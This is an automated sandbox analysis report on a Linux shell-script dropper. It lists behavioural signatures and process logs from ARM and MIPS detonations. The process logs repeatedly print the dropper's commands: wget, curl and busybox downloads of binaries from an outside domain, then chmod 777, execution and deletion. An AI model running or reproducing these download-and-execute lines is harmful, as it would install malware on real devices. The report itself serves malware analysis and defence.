Analysis Overview
SHA256
6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244
Threat Level: Shows suspicious behavior
The file 6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-10-28 02:44
Signatures
Analysis: behavioral2
Detonation Overview
Submitted
2024-10-28 02:44
Reported
2024-10-28 02:47
Platform
debian9-armhf-20240611-en
Max time kernel
149s
Max time network
8s
Command Line
Signatures
Checks CPU configuration
| Description | Indicator | Process | Target |
| File opened for reading | /proc/cpuinfo | /usr/bin/curl | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/self/auxv | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Processes
/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
Files
Analysis: behavioral3
Detonation Overview
Submitted
2024-10-28 02:44
Reported
2024-10-28 02:46
Platform
debian9-mipsbe-20240611-en
Max time kernel
111s
Max time network
85s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | N/A |
| N/A | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | N/A |
| N/A | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | N/A |
| N/A | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | N/A |
| N/A | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | N/A |
| N/A | /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c | /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c | N/A |
| N/A | /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk | /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk | N/A |
| N/A | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | N/A |
| N/A | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | N/A |
| N/A | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | N/A |
| N/A | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | N/A |
| N/A | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | N/A |
| N/A | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | N/A |
| N/A | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | N/A |
| N/A | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | N/A |
| N/A | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | N/A |
| N/A | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | N/A |
| N/A | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | N/A |
| N/A | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | N/A |
| N/A | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | N/A |
| N/A | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | N/A |
| N/A | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | N/A |
| N/A | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | N/A |
| N/A | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | N/A |
| N/A | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | N/A |
| N/A | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | N/A |
| N/A | /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c | /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c | N/A |
| N/A | /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk | /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG | /usr/bin/curl | N/A |
| File opened for modification | /tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v | /usr/bin/curl | N/A |
| File opened for modification | /tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS | /usr/bin/curl | N/A |
Processes
/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh
[/tmp/6f693f775447642c30c2026544c0b164b9b8a9142b2a9e8339452e36567cd244.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/chmod
[chmod 777 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/tmp/07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH
[./07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/bin/rm
[rm 07dhv1idPuMGGd8slnpLWIcvJPZiZye1jH]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/chmod
[chmod 777 XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/tmp/XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF
[./XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/bin/rm
[rm XCJlvMi4BXQjM3HPumNHONe1Dqa0ThqYRF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/chmod
[chmod 777 He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/tmp/He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG
[./He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/bin/rm
[rm He2gP0wW0uSikVPiDGnGbPD0qrAn0tiMMG]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/chmod
[chmod 777 cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/tmp/cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS
[./cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/bin/rm
[rm cN97NbrWnUSQ6PXGX9Y9hBJyrkIZ5KH2tS]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/chmod
[chmod 777 ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/tmp/ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj
[./ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/bin/rm
[rm ZXY2ZiXI45NfQ8CCMnATLDWrqVWYvOr6Vj]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/bin/chmod
[chmod 777 mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/tmp/mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c
[./mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/bin/rm
[rm mh6x0I42vYbr3Qre65Ks5ciE3qeGlJ4d4c]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/bin/chmod
[chmod 777 HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/tmp/HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk
[./HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/bin/rm
[rm HzUyFTVGRSm2mTxUCbOwUPnHcxNJOLuquk]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/chmod
[chmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN
[./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/rm
[rm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/chmod
[chmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v
[./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/rm
[rm i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/chmod
[chmod 777 Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/tmp/Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb
[./Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/bin/rm
[rm Grdv6tA8z4YNEL1EgJpbfI3mF0kIamI1Gb]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/chmod
[chmod 777 jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/tmp/jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I
[./jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/bin/rm
[rm jmrARVrSePzqeuisZuHGMOg98ID3wIgP5I]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/chmod
[chmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28
[./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/rm
[rm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/chmod
[chmod 777 Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/tmp/Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc
[./Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/bin/rm
[rm Yj1umCkTSsI1gGib85VFE3tVbrzRZQULxc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/chmod
[chmod 777 Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/tmp/Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa
[./Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/bin/rm
[rm Qr5mzt39rF9OmRffAnSxCk5drdly1l8WEa]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/chmod
[chmod 777 tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/tmp/tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28
[./tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/bin/rm
[rm tA9WKkrGkymtC5AT9eQj6rXct7KJ7z9s28]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/chmod
[chmod 777 oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/tmp/oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN
[./oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/bin/rm
[rm oNB8yMTnvrjR9a2Y7Tpw7D634oIH4qH8QN]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/chmod
[chmod 777 i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/tmp/i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v
[./i5oqdLjP7Z5nMdEYEqyBeSBFdHzysUXQ1v]
/bin/rm
